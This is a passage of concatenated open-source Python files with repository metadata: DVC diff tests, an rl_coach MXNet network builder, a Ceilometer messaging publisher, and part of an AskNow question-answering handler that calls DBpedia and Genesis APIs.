tmp_dir.dvc_gen(
{"dir2": {"file": "text1", "subdir": {"file2": "text2"}}},
commit=last_commit_msg,
)
assert dvc.diff(a_rev) == {
"added": [
{
"path": os.path.join("dir2", ""),
"hash": "cb58ee07cb01044db229e4d6121a0dfc.dir",
},
{
"path": os.path.join("dir2", "file"),
"hash": "cef7ccd89dacf1ced6f5ec91d759953f",
},
{
"path": os.path.join("dir2", "subdir", "file2"),
"hash": "fe6123a759017e4a2af4a2d19961ed71",
},
],
"deleted": [],
"modified": [],
"renamed": [],
"not in cache": [],
}
@pytest.mark.parametrize("commit_last", [True, False])
def test_diff_rename_folder(tmp_dir, scm, dvc, commit_last):
if commit_last:
last_commit_msg = "commit #2"
a_rev = "HEAD~1"
else:
last_commit_msg = None
a_rev = "HEAD"
tmp_dir.dvc_gen(
{"dir": {"file": "text1", "subdir": {"file2": "text2"}}},
commit="commit #1",
)
(tmp_dir / "dir").replace(tmp_dir / "dir2")
tmp_dir.dvc_add("dir2", commit=last_commit_msg)
assert dvc.diff(a_rev) == {
"added": [],
"deleted": [],
"modified": [],
"renamed": [
{
"path": {
"old": os.path.join("dir", ""),
"new": os.path.join("dir2", ""),
},
"hash": "cb58ee07cb01044db229e4d6121a0dfc.dir",
},
{
"path": {
"old": os.path.join("dir", "file"),
"new": os.path.join("dir2", "file"),
},
"hash": "cef7ccd89dacf1ced6f5ec91d759953f",
},
{
"path": {
"old": os.path.join("dir", "subdir", "file2"),
"new": os.path.join("dir2", "subdir", "file2"),
},
"hash": "fe6123a759017e4a2af4a2d19961ed71",
},
],
"not in cache": [],
}
@pytest.mark.parametrize("commit_last", [True, False])
def test_diff_rename_file(tmp_dir, scm, dvc, commit_last):
if commit_last:
last_commit_msg = "commit #2"
a_rev = "HEAD~1"
else:
last_commit_msg = None
a_rev = "HEAD"
paths = tmp_dir.gen(
{"dir": {"file": "text1", "subdir": {"file2": "text2"}}}
)
tmp_dir.dvc_add(paths, commit="commit #1")
(tmp_dir / "dir" / "file").replace(tmp_dir / "dir" / "subdir" / "file3")
tmp_dir.dvc_add(paths, commit=last_commit_msg)
assert dvc.diff(a_rev) == {
"added": [],
"deleted": [],
"modified": [
{
"path": os.path.join("dir", ""),
"hash": {
"old": "cb58ee07cb01044db229e4d6121a0dfc.dir",
"new": "a4ac9c339aacc60b6a3152e362c319c8.dir",
},
}
],
"renamed": [
{
"path": {
"old": os.path.join("dir", "file"),
"new": os.path.join("dir", "subdir", "file3"),
},
"hash": "cef7ccd89dacf1ced6f5ec91d759953f",
}
],
"not in cache": [],
}
def test_rename_multiple_files_same_hashes(tmp_dir, scm, dvc):
"""Test diff by renaming >=2 instances of file with same hashes.
DVC should be able to detect that they are renames, and should not include
them in either of the `added` or the `deleted` section.
"""
tmp_dir.dvc_gen(
{"dir": {"foo": "foo", "subdir": {"foo": "foo"}}}, commit="commit #1"
)
remove(tmp_dir / "dir")
# changing foo and subdir/foo to bar and subdir/bar respectively
tmp_dir.dvc_gen(
{"dir": {"bar": "foo", "subdir": {"bar": "foo"}}}, commit="commit #2"
)
assert dvc.diff("HEAD~") == {
"added": [],
"deleted": [],
"modified": [
{
"hash": {
"new": "31b36b3ea5f4485e27f10578c47183b0.dir",
"old": "c7684c8b3b0d28cf80d5305e2d856bfc.dir",
},
"path": os.path.join("dir", ""),
}
],
"not in cache": [],
"renamed": [
{
"hash": "acbd18db4cc2f85cedef654fccc4a4d8",
"path": {
"new": os.path.join("dir", "bar"),
"old": os.path.join("dir", "foo"),
},
},
{
"hash": "acbd18db4cc2f85cedef654fccc4a4d8",
"path": {
"new": os.path.join("dir", "subdir", "bar"),
"old": os.path.join("dir", "subdir", "foo"),
},
},
],
}
|
efiop/dvc
|
tests/func/test_diff.py
|
Python
|
apache-2.0
| 16,935
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from itertools import chain
from typing import List, Tuple, Union
from types import ModuleType
import numpy as np
import mxnet as mx
from mxnet import nd, sym
from mxnet.gluon import HybridBlock
from mxnet.ndarray import NDArray
from mxnet.symbol import Symbol
from rl_coach.base_parameters import NetworkParameters
from rl_coach.architectures.embedder_parameters import InputEmbedderParameters
from rl_coach.architectures.head_parameters import HeadParameters, PPOHeadParameters
from rl_coach.architectures.head_parameters import PPOVHeadParameters, VHeadParameters, QHeadParameters
from rl_coach.architectures.middleware_parameters import MiddlewareParameters
from rl_coach.architectures.middleware_parameters import FCMiddlewareParameters, LSTMMiddlewareParameters
from rl_coach.architectures.mxnet_components.architecture import MxnetArchitecture
from rl_coach.architectures.mxnet_components.embedders import ImageEmbedder, TensorEmbedder, VectorEmbedder
from rl_coach.architectures.mxnet_components.heads import Head, HeadLoss, PPOHead, PPOVHead, VHead, QHead
from rl_coach.architectures.mxnet_components.middlewares import FCMiddleware, LSTMMiddleware
from rl_coach.architectures.mxnet_components import utils
from rl_coach.base_parameters import AgentParameters, Device, DeviceType, EmbeddingMergerType
from rl_coach.spaces import SpacesDefinition, PlanarMapsObservationSpace, TensorObservationSpace
class GeneralMxnetNetwork(MxnetArchitecture):
"""
A generalized version of all possible networks implemented using mxnet.
"""
@staticmethod
def construct(variable_scope: str, devices: List[str], *args, **kwargs) -> 'GeneralTensorFlowNetwork':
"""
Construct a network class using the provided variable scope and on requested devices
:param variable_scope: string specifying variable scope under which to create network variables
:param devices: list of devices (can be list of Device objects, or string for TF distributed)
:param args: all other arguments for class initializer
:param kwargs: all other keyword arguments for class initializer
:return: a GeneralTensorFlowNetwork object
"""
return GeneralMxnetNetwork(*args, devices=[GeneralMxnetNetwork._mx_device(d) for d in devices], **kwargs)
@staticmethod
def _mx_device(device: Union[str, Device]) -> mx.Context:
"""
Convert device to tensorflow-specific device representation
:param device: either a specific string (used in distributed mode) which is returned without
any change or a Device type
:return: tensorflow-specific string for device
"""
if isinstance(device, Device):
if device.device_type == DeviceType.CPU:
return mx.cpu()
elif device.device_type == DeviceType.GPU:
return mx.gpu(device.index)
else:
raise ValueError("Invalid device_type: {}".format(device.device_type))
else:
raise ValueError("Invalid device instance type: {}".format(type(device)))
def __init__(self,
agent_parameters: AgentParameters,
spaces: SpacesDefinition,
devices: List[mx.Context],
name: str,
global_network=None,
network_is_local: bool=True,
network_is_trainable: bool=False):
"""
:param agent_parameters: the agent parameters
:param spaces: the spaces definition of the agent
:param devices: list of devices to run the network on
:param name: the name of the network
:param global_network: the global network replica that is shared between all the workers
:param network_is_local: is the network global (shared between workers) or local (dedicated to the worker)
:param network_is_trainable: is the network trainable (we can apply gradients on it)
"""
self.network_wrapper_name = name.split('/')[0]
self.network_parameters = agent_parameters.network_wrappers[self.network_wrapper_name]
if self.network_parameters.use_separate_networks_per_head:
self.num_heads_per_network = 1
self.num_networks = len(self.network_parameters.heads_parameters)
else:
self.num_heads_per_network = len(self.network_parameters.heads_parameters)
self.num_networks = 1
super().__init__(agent_parameters, spaces, devices, name, global_network,
network_is_local, network_is_trainable)
def construct_model(self):
# validate the configuration
if len(self.network_parameters.input_embedders_parameters) == 0:
raise ValueError("At least one input type should be defined")
if len(self.network_parameters.heads_parameters) == 0:
raise ValueError("At least one output type should be defined")
if self.network_parameters.middleware_parameters is None:
raise ValueError("Exactly one middleware type should be defined")
self.model = GeneralModel(
num_networks=self.num_networks,
num_heads_per_network=self.num_heads_per_network,
network_is_local=self.network_is_local,
network_name=self.network_wrapper_name,
agent_parameters=self.ap,
network_parameters=self.network_parameters,
spaces=self.spaces)
self.losses = self.model.losses()
# Learning rate
lr_scheduler = None
if self.network_parameters.learning_rate_decay_rate != 0:
lr_scheduler = mx.lr_scheduler.FactorScheduler(
step=self.network_parameters.learning_rate_decay_steps,
factor=self.network_parameters.learning_rate_decay_rate)
# Optimizer
# FIXME Does this code for distributed training make sense?
if self.distributed_training and self.network_is_local and self.network_parameters.shared_optimizer:
# distributed training + is a local network + optimizer shared -> take the global optimizer
self.optimizer = self.global_network.optimizer
elif (self.distributed_training and self.network_is_local and not self.network_parameters.shared_optimizer)\
or self.network_parameters.shared_optimizer or not self.distributed_training:
if self.network_parameters.optimizer_type == 'Adam':
self.optimizer = mx.optimizer.Adam(
learning_rate=self.network_parameters.learning_rate,
beta1=self.network_parameters.adam_optimizer_beta1,
beta2=self.network_parameters.adam_optimizer_beta2,
epsilon=self.network_parameters.optimizer_epsilon,
lr_scheduler=lr_scheduler)
elif self.network_parameters.optimizer_type == 'RMSProp':
self.optimizer = mx.optimizer.RMSProp(
learning_rate=self.network_parameters.learning_rate,
gamma1=self.network_parameters.rms_prop_optimizer_decay,
epsilon=self.network_parameters.optimizer_epsilon,
lr_scheduler=lr_scheduler)
elif self.network_parameters.optimizer_type == 'LBFGS':
raise NotImplementedError('LBFGS optimizer not implemented')
else:
raise Exception("{} is not a valid optimizer type".format(self.network_parameters.optimizer_type))
@property
def output_heads(self):
return self.model.output_heads
def _get_activation(activation_function_string: str):
"""
Map the activation function from a string to the mxnet framework equivalent
:param activation_function_string: the type of the activation function
:return: mxnet activation function string
"""
return utils.get_mxnet_activation_name(activation_function_string)
def _sanitize_activation(params: Union[InputEmbedderParameters, MiddlewareParameters, HeadParameters]) ->\
Union[InputEmbedderParameters, MiddlewareParameters, HeadParameters]:
"""
Change activation function to the mxnet specific value
:param params: any parameter that has activation_function property
:return: copy of params with activation function correctly set
"""
params_copy = copy.copy(params)
params_copy.activation_function = _get_activation(params.activation_function)
return params_copy
def _get_input_embedder(spaces: SpacesDefinition,
input_name: str,
embedder_params: InputEmbedderParameters) -> ModuleType:
"""
Given an input embedder parameters class, creates the input embedder and returns it
:param input_name: the name of the input to the embedder (used for retrieving the shape). The input should
be a value within the state or the action.
:param embedder_params: the parameters of the class of the embedder
:return: the embedder instance
"""
allowed_inputs = copy.copy(spaces.state.sub_spaces)
allowed_inputs["action"] = copy.copy(spaces.action)
allowed_inputs["goal"] = copy.copy(spaces.goal)
if input_name not in allowed_inputs.keys():
raise ValueError("The key for the input embedder ({}) must match one of the following keys: {}"
.format(input_name, allowed_inputs.keys()))
type = "vector"
if isinstance(allowed_inputs[input_name], TensorObservationSpace):
type = "tensor"
elif isinstance(allowed_inputs[input_name], PlanarMapsObservationSpace):
type = "image"
def sanitize_params(params: InputEmbedderParameters):
params_copy = _sanitize_activation(params)
# params_copy.input_rescaling = params_copy.input_rescaling[type]
# params_copy.input_offset = params_copy.input_offset[type]
params_copy.name = input_name
return params_copy
embedder_params = sanitize_params(embedder_params)
if type == 'vector':
module = VectorEmbedder(embedder_params)
elif type == 'image':
module = ImageEmbedder(embedder_params)
elif type == 'tensor':
module = TensorEmbedder(embedder_params)
else:
raise KeyError('Unsupported embedder type: {}'.format(type))
return module
def _get_middleware(middleware_params: MiddlewareParameters) -> ModuleType:
"""
Given a middleware type, creates the middleware and returns it
:param middleware_params: the paramaeters of the middleware class
:return: the middleware instance
"""
middleware_params = _sanitize_activation(middleware_params)
if isinstance(middleware_params, FCMiddlewareParameters):
module = FCMiddleware(middleware_params)
elif isinstance(middleware_params, LSTMMiddlewareParameters):
module = LSTMMiddleware(middleware_params)
else:
raise KeyError('Unsupported middleware type: {}'.format(type(middleware_params)))
return module
def _get_output_head(
head_params: HeadParameters,
head_idx: int,
head_type_index: int,
agent_params: AgentParameters,
spaces: SpacesDefinition,
network_name: str,
is_local: bool) -> Head:
"""
Given a head type, creates the head and returns it
:param head_params: the parameters of the head to create
:param head_idx: the head index
:param head_type_index: the head type index (same index if head_param.num_output_head_copies>0)
:param agent_params: agent parameters
:param spaces: state and action space definitions
:param network_name: name of the network
:param is_local:
:return: head block
"""
head_params = _sanitize_activation(head_params)
if isinstance(head_params, PPOHeadParameters):
module = PPOHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
elif isinstance(head_params, VHeadParameters):
module = VHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
elif isinstance(head_params, PPOVHeadParameters):
module = PPOVHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
elif isinstance(head_params, QHeadParameters):
module = QHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
else:
raise KeyError('Unsupported head type: {}'.format(type(head_params)))
return module
class ScaledGradHead(HybridBlock, utils.OnnxHandlerBlock):
"""
Wrapper block for applying gradient scaling to input before feeding the head network
"""
def __init__(self,
head_index: int,
head_type_index: int,
network_name: str,
spaces: SpacesDefinition,
network_is_local: bool,
agent_params: AgentParameters,
head_params: HeadParameters) -> None:
"""
:param head_index: the head index
:param head_type_index: the head type index (same index if head_param.num_output_head_copies>0)
:param network_name: name of the network
:param spaces: state and action space definitions
:param network_is_local: whether network is local
:param agent_params: agent parameters
:param head_params: head parameters
"""
super(ScaledGradHead, self).__init__()
utils.OnnxHandlerBlock.__init__(self)
head_params = _sanitize_activation(head_params)
with self.name_scope():
self.head = _get_output_head(
head_params=head_params,
head_idx=head_index,
head_type_index=head_type_index,
agent_params=agent_params,
spaces=spaces,
network_name=network_name,
is_local=network_is_local)
self.gradient_rescaler = self.params.get_constant(
name='gradient_rescaler',
value=np.array([float(head_params.rescale_gradient_from_head_by_factor)]))
# self.gradient_rescaler = self.params.get(
# name='gradient_rescaler',
# shape=(1,),
# init=mx.init.Constant(float(head_params.rescale_gradient_from_head_by_factor)))
def hybrid_forward(self,
F: ModuleType,
x: Union[NDArray, Symbol],
gradient_rescaler: Union[NDArray, Symbol]) -> Tuple[Union[NDArray, Symbol], ...]:
""" Overrides gluon.HybridBlock.hybrid_forward
:param nd or sym F: ndarray or symbol module
:param x: head input
:param gradient_rescaler: gradient rescaler for partial blocking of gradient
:return: head output
"""
if self._onnx:
# ONNX doesn't support BlockGrad() operator, but it's not typically needed for
# ONNX because mostly forward calls are performed using ONNX exported network.
grad_scaled_x = x
else:
grad_scaled_x = (F.broadcast_mul((1 - gradient_rescaler), F.BlockGrad(x)) +
F.broadcast_mul(gradient_rescaler, x))
out = self.head(grad_scaled_x)
return out
class SingleModel(HybridBlock):
"""
Block that connects a single embedder, with middleware and one to multiple heads
"""
def __init__(self,
network_is_local: bool,
network_name: str,
agent_parameters: AgentParameters,
in_emb_param_dict: {str: InputEmbedderParameters},
embedding_merger_type: EmbeddingMergerType,
middleware_param: MiddlewareParameters,
head_param_list: [HeadParameters],
head_type_idx_start: int,
spaces: SpacesDefinition,
*args, **kwargs):
"""
:param network_is_local: True if network is local
:param network_name: name of the network
:param agent_parameters: agent parameters
:param in_emb_param_dict: dictionary of embedder name to embedding parameters
:param embedding_merger_type: type of merging output of embedders: concatenate or sum
:param middleware_param: middleware parameters
:param head_param_list: list of head parameters, one per head type
:param head_type_idx_start: start index for head type index counting
:param spaces: state and action space definition
"""
super(SingleModel, self).__init__(*args, **kwargs)
self._embedding_merger_type = embedding_merger_type
self._input_embedders = list() # type: List[HybridBlock]
self._output_heads = list() # type: List[ScaledGradHead]
with self.name_scope():
for input_name in sorted(in_emb_param_dict):
input_type = in_emb_param_dict[input_name]
input_embedder = _get_input_embedder(spaces, input_name, input_type)
self.register_child(input_embedder)
self._input_embedders.append(input_embedder)
self.middleware = _get_middleware(middleware_param)
for i, head_param in enumerate(head_param_list):
for head_copy_idx in range(head_param.num_output_head_copies):
# create output head and add it to the output heads list
output_head = ScaledGradHead(
head_index=(head_type_idx_start + i) * head_param.num_output_head_copies + head_copy_idx,
head_type_index=head_type_idx_start + i,
network_name=network_name,
spaces=spaces,
network_is_local=network_is_local,
agent_params=agent_parameters,
head_params=head_param)
self.register_child(output_head)
self._output_heads.append(output_head)
def hybrid_forward(self, F, *inputs: Union[NDArray, Symbol]) -> Tuple[Union[NDArray, Symbol], ...]:
""" Overrides gluon.HybridBlock.hybrid_forward
:param nd or sym F: ndarray or symbol block
:param inputs: model inputs, one for each embedder
:return: head outputs in a tuple
"""
# Input Embeddings
state_embedding = list()
for input, embedder in zip(inputs, self._input_embedders):
state_embedding.append(embedder(input))
# Merger
if len(state_embedding) == 1:
state_embedding = state_embedding[0]
else:
if self._embedding_merger_type == EmbeddingMergerType.Concat:
state_embedding = F.concat(*state_embedding, dim=1, name='merger') # NC or NCHW layout
elif self._embedding_merger_type == EmbeddingMergerType.Sum:
state_embedding = F.add_n(*state_embedding, name='merger')
# Middleware
state_embedding = self.middleware(state_embedding)
# Head
outputs = tuple()
for head in self._output_heads:
out = head(state_embedding)
if not isinstance(out, tuple):
out = (out,)
outputs += out
return outputs
@property
def input_embedders(self) -> List[HybridBlock]:
"""
:return: list of input embedders
"""
return self._input_embedders
@property
def output_heads(self) -> List[Head]:
"""
:return: list of output heads
"""
return [h.head for h in self._output_heads]
class GeneralModel(HybridBlock):
"""
Block that creates multiple single models
"""
def __init__(self,
num_networks: int,
num_heads_per_network: int,
network_is_local: bool,
network_name: str,
agent_parameters: AgentParameters,
network_parameters: NetworkParameters,
spaces: SpacesDefinition,
*args, **kwargs):
"""
:param num_networks: number of networks to create
:param num_heads_per_network: number of heads per network to create
:param network_is_local: True if network is local
:param network_name: name of the network
:param agent_parameters: agent parameters
:param network_parameters: network parameters
:param spaces: state and action space definitions
"""
super(GeneralModel, self).__init__(*args, **kwargs)
with self.name_scope():
self.nets = list()
for network_idx in range(num_networks):
head_type_idx_start = network_idx * num_heads_per_network
head_type_idx_end = head_type_idx_start + num_heads_per_network
net = SingleModel(
head_type_idx_start=head_type_idx_start,
network_name=network_name,
network_is_local=network_is_local,
agent_parameters=agent_parameters,
in_emb_param_dict=network_parameters.input_embedders_parameters,
embedding_merger_type=network_parameters.embedding_merger_type,
middleware_param=network_parameters.middleware_parameters,
head_param_list=network_parameters.heads_parameters[head_type_idx_start:head_type_idx_end],
spaces=spaces)
self.register_child(net)
self.nets.append(net)
def hybrid_forward(self, F, *inputs):
""" Overrides gluon.HybridBlock.hybrid_forward
:param nd or sym F: ndarray or symbol block
:param inputs: model inputs, one for each embedder. Passed to all networks.
:return: head outputs in a tuple
"""
outputs = tuple()
for net in self.nets:
out = net(*inputs)
outputs += out
return outputs
@property
def output_heads(self) -> List[Head]:
""" Return all heads in a single list
Note: There is a one-to-one mapping between output_heads and losses
:return: list of heads
"""
return list(chain.from_iterable(net.output_heads for net in self.nets))
def losses(self) -> List[HeadLoss]:
""" Construct loss blocks for network training
Note: There is a one-to-one mapping between output_heads and losses
:return: list of loss blocks
"""
return [h.loss() for net in self.nets for h in net.output_heads]
|
NervanaSystems/coach
|
rl_coach/architectures/mxnet_components/general_network.py
|
Python
|
apache-2.0
| 24,307
|
#
# Copyright 2012 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Publish a sample using the preferred RPC mechanism.
"""
import abc
import itertools
import operator
from oslo_config import cfg
from oslo_log import log
import oslo_messaging
from oslo_utils import encodeutils
from oslo_utils import excutils
import six
import six.moves.urllib.parse as urlparse
from ceilometer.i18n import _, _LE, _LI
from ceilometer import messaging
from ceilometer import publisher
from ceilometer.publisher import utils
LOG = log.getLogger(__name__)
NOTIFIER_OPTS = [
cfg.StrOpt('metering_topic',
default='metering',
help='The topic that ceilometer uses for metering '
'notifications.',
),
cfg.StrOpt('event_topic',
default='event',
help='The topic that ceilometer uses for event '
'notifications.',
),
cfg.StrOpt('telemetry_driver',
default='messagingv2',
help='The driver that ceilometer uses for metering '
'notifications.',
deprecated_name='metering_driver',
)
]
cfg.CONF.register_opts(NOTIFIER_OPTS,
group="publisher_notifier")
cfg.CONF.import_opt('host', 'ceilometer.service')
class DeliveryFailure(Exception):
def __init__(self, message=None, cause=None):
super(DeliveryFailure, self).__init__(message)
self.cause = cause
def raise_delivery_failure(exc):
excutils.raise_with_cause(DeliveryFailure,
encodeutils.exception_to_unicode(exc),
cause=exc)
@six.add_metaclass(abc.ABCMeta)
class MessagingPublisher(publisher.PublisherBase):
def __init__(self, parsed_url):
options = urlparse.parse_qs(parsed_url.query)
# the value of options is a list of url param values
# only take care of the latest one if the option
# is provided more than once
self.per_meter_topic = bool(int(
options.get('per_meter_topic', [0])[-1]))
self.policy = options.get('policy', ['default'])[-1]
self.max_queue_length = int(options.get(
'max_queue_length', [1024])[-1])
self.max_retry = 0
self.local_queue = []
if self.policy in ['default', 'queue', 'drop']:
LOG.info(_LI('Publishing policy set to %s'), self.policy)
else:
LOG.warning(_('Publishing policy is unknown (%s) force to '
'default'), self.policy)
self.policy = 'default'
self.retry = 1 if self.policy in ['queue', 'drop'] else None
def publish_samples(self, samples):
"""Publish samples on RPC.
:param samples: Samples from pipeline after transformation.
"""
meters = [
utils.meter_message_from_counter(
sample, cfg.CONF.publisher.telemetry_secret)
for sample in samples
]
topic = cfg.CONF.publisher_notifier.metering_topic
self.local_queue.append((topic, meters))
if self.per_meter_topic:
for meter_name, meter_list in itertools.groupby(
sorted(meters, key=operator.itemgetter('counter_name')),
operator.itemgetter('counter_name')):
meter_list = list(meter_list)
topic_name = topic + '.' + meter_name
LOG.debug('Publishing %(m)d samples on %(n)s',
{'m': len(meter_list), 'n': topic_name})
self.local_queue.append((topic_name, meter_list))
self.flush()
def flush(self):
# NOTE(sileht):
# this is why the self.local_queue is emptied before processing the
# queue and the remaining messages in the queue are added to
# self.local_queue after in case of another call having already added
# something in the self.local_queue
queue = self.local_queue
self.local_queue = []
self.local_queue = (self._process_queue(queue, self.policy) +
self.local_queue)
if self.policy == 'queue':
self._check_queue_length()
def _check_queue_length(self):
queue_length = len(self.local_queue)
if queue_length > self.max_queue_length > 0:
count = queue_length - self.max_queue_length
self.local_queue = self.local_queue[count:]
LOG.warning(_("Publisher max local_queue length is exceeded, "
"dropping %d oldest samples") % count)
def _process_queue(self, queue, policy):
current_retry = 0
while queue:
topic, data = queue[0]
try:
self._send(topic, data)
except DeliveryFailure:
data = sum([len(m) for __, m in queue])
if policy == 'queue':
LOG.warning(_("Failed to publish %d datapoints, queue "
"them"), data)
return queue
elif policy == 'drop':
LOG.warning(_("Failed to publish %d datapoints, "
"dropping them"), data)
return []
current_retry += 1
if current_retry >= self.max_retry:
LOG.exception(_LE("Failed to retry to send sample data "
"with max_retry times"))
raise
else:
queue.pop(0)
return []
def publish_events(self, events):
"""Send an event message for publishing
:param events: events from pipeline after transformation
"""
ev_list = [utils.message_from_event(
event, cfg.CONF.publisher.telemetry_secret) for event in events]
topic = cfg.CONF.publisher_notifier.event_topic
self.local_queue.append((topic, ev_list))
self.flush()
@abc.abstractmethod
def _send(self, topic, meters):
"""Send the meters to the messaging topic."""
class NotifierPublisher(MessagingPublisher):
def __init__(self, parsed_url, default_topic):
super(NotifierPublisher, self).__init__(parsed_url)
options = urlparse.parse_qs(parsed_url.query)
topic = options.pop('topic', [default_topic])
driver = options.pop('driver', ['rabbit'])[0]
url = None
if parsed_url.netloc != '':
url = urlparse.urlunsplit([driver, parsed_url.netloc,
parsed_url.path,
urlparse.urlencode(options, True),
parsed_url.fragment])
self.notifier = oslo_messaging.Notifier(
messaging.get_transport(cfg.CONF, url),
driver=cfg.CONF.publisher_notifier.telemetry_driver,
publisher_id='telemetry.publisher.%s' % cfg.CONF.host,
topics=topic,
retry=self.retry
)
def _send(self, event_type, data):
try:
self.notifier.sample({}, event_type=event_type,
payload=data)
except oslo_messaging.MessageDeliveryFailure as e:
raise_delivery_failure(e)
class SampleNotifierPublisher(NotifierPublisher):
def __init__(self, parsed_url):
super(SampleNotifierPublisher, self).__init__(
parsed_url, cfg.CONF.publisher_notifier.metering_topic)
class EventNotifierPublisher(NotifierPublisher):
def __init__(self, parsed_url):
super(EventNotifierPublisher, self).__init__(
parsed_url, cfg.CONF.publisher_notifier.event_topic)
|
ityaptin/ceilometer
|
ceilometer/publisher/messaging.py
|
Python
|
apache-2.0
| 8,270
|
# -*- coding: utf-8 -*-
# Copyright 2017 Janko Hoener
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from google.appengine.api import memcache, urlfetch, urlfetch_errors
import logging
from handlerlib import *
from datatypes import *
from userauth import *
import urllib, urllib2
from urllib2 import Request
import os
from google.appengine.api.urlfetch_errors import *
class AskNowJSONAnswerHandler(Handler):
GENESIS_API_URL = 'http://genesis.aksw.org/api/'
GENESIS_APIS = ['description', 'similar', 'related', 'images', 'videos']
GENESIS_QUERY_APIS = ['images', 'videos']
GENESIS_API_JSON_MAPPING = {'related': 'relatedEntities', 'similar': 'similarEntities'}
DBPEDIASL_URL = 'http://model.dbpedia-spotlight.org/en/annotate'
DBPEDIA_URL = 'http://dbpedia.org/resource/'
DBPEDIA_API_URL = 'http://dbpedia.org/sparql'
DBPEDIASL_CONF = 0.4
def retrieve_info(self, titles):
resp = {}
resp['information'] = []
resp['answers'] = []
for title in titles:
title_type = type(title)
if title_type is int or title_type is float:
resp['answers'].append("{:,}".format(title))
titles.remove(title)
continue
elif title_type is bool:
resp['answers'].append(('Yes', 'No')[title])
titles.remove(title)
continue
elif title_type is not str:
raise ValueError('title must be string, int, float or boolean')
# elif title_type is str:
cur_info = {}
cur_info['title'] = title
for api in self.GENESIS_APIS:
dbpurl = {}
if api in self.GENESIS_QUERY_APIS:
dbpurl['q'] = title
else:
dbpurl['url'] = self.DBPEDIA_URL + self.encode_title(title)
dbpjson = json.dumps(dbpurl)
url = self.GENESIS_API_URL + api
retry = 2
while retry:
try:
urlobj = urlfetch.fetch(url, method='POST', payload=dbpjson, headers={'Accept': 'application/json', 'Content-Type': 'application/json', 'Connection': 'keep-alive'}, deadline=1)
except:
retry = retry - 1
if not retry:
if api in self.GENESIS_API_JSON_MAPPING:
cur_info[self.GENESIS_API_JSON_MAPPING[api]] = None
else:
cur_info[api] = None
break
else:
if urlobj.status_code == 200:
cur_info.update(json.loads(urlobj.content))
break
else:
retry = retry - 1
if not retry:
if api in self.GENESIS_API_JSON_MAPPING:
answer[self.GENESIS_API_JSON_MAPPING[api]] = None
else:
answer[api] = None
break
resp['information'].append(cur_info)
resp['answers'].extend(titles)
resp['lenanswers'] = len(resp['answers'])
resp['status'] = 0
resp['message'] = 'Connection successful.'
return resp
def retrieve_entities(self, phrase):
param = {}
param['text'] = phrase
param['confidence'] = self.DBPEDIASL_CONF
params = 'text=%s&confidence=%s' % (param['text'], param['confidence'])
url = self.DBPEDIASL_URL + '?' + urllib.urlencode(param)
logging.info('Retrieving entities for %s from %s' % (phrase, url))
headers = { 'Accept' : 'application/json' }
retry = 2
while retry:
try:
a = urlfetch.fetch(url, headers = headers)
except:
retry = retry - 1
if not retry:
return []
else:
if a.status_code == 200:
entityobj = json.loads(a.content)
logging.debug(entityobj)
if entityobj.get('Resources'):
titles = []
for entity in entityobj['Resources']:
if entity.get('@URI'):
title = self.retrieve_title_from_url(entity['@URI']).encode('utf-8')
titles.append(title)
if titles:
logging.info('Successfully retrieved entities for %s' % phrase)
return titles
else:
return []
else:
return []
else:
return []
def retrieve_titles(self, question):
# FIXME: this should use a call to an AskNow API
known_answers = {
'how many symphonies did beethoven compose': [9],
'how many inhabitants does oberhausen have': [210934],
'is albert einstein alive': [True],
'is kanye west alive': [False],
'who is the president of the united states': ['Barack Obama'],
'how many goals did gerd müller score': ['Gerd Müller'],
'who is the president elect of the united states': ['Donald Trump'],
'in which city was beethoven born': ['Bonn'],
'in which city was adenauer born': ['Cologne'],
'what country is shah rukh khan from': ['India'],
'what are the capitals of germany and india': ['Berlin', 'New Delhi'],
'what are the capitals of germany, india and usa': ['Berlin', 'New Delhi', 'Washington D.C.'],
'what are the capitals of germany, india, usa and france': ['Berlin', 'New Delhi', 'Washington D.C.', 'Paris']
}
if question in known_answers:
return known_answers[question]
else:
return []
def get(self):
query = question = self.request.get('q')
logging.info('Generating JSON for query %s' % query)
question = question.lower().replace('?', '')
question = question.encode('utf-8')
answers = {}
if query:
logging.info('Retrieving titles for question %s' % question)
titles = self.retrieve_titles(question)
logging.info('Retrieved %s titles.' % len(titles))
if len(titles) > 0:
logging.info('Question answered by AskNow, retrieving info for titles.')
answers = self.retrieve_info(titles)
answers['answered'] = True
if len(answers['information']) == 0 and answers.get('lenanswers') > 0:
logging.info('Question answered, but no information on entities available.' +
'Loading info for entities of question.')
entitytitles = self.retrieve_entities(question)
entityanswers = self.retrieve_info(entitytitles)
answers['information'].extend(entityanswers['information'])
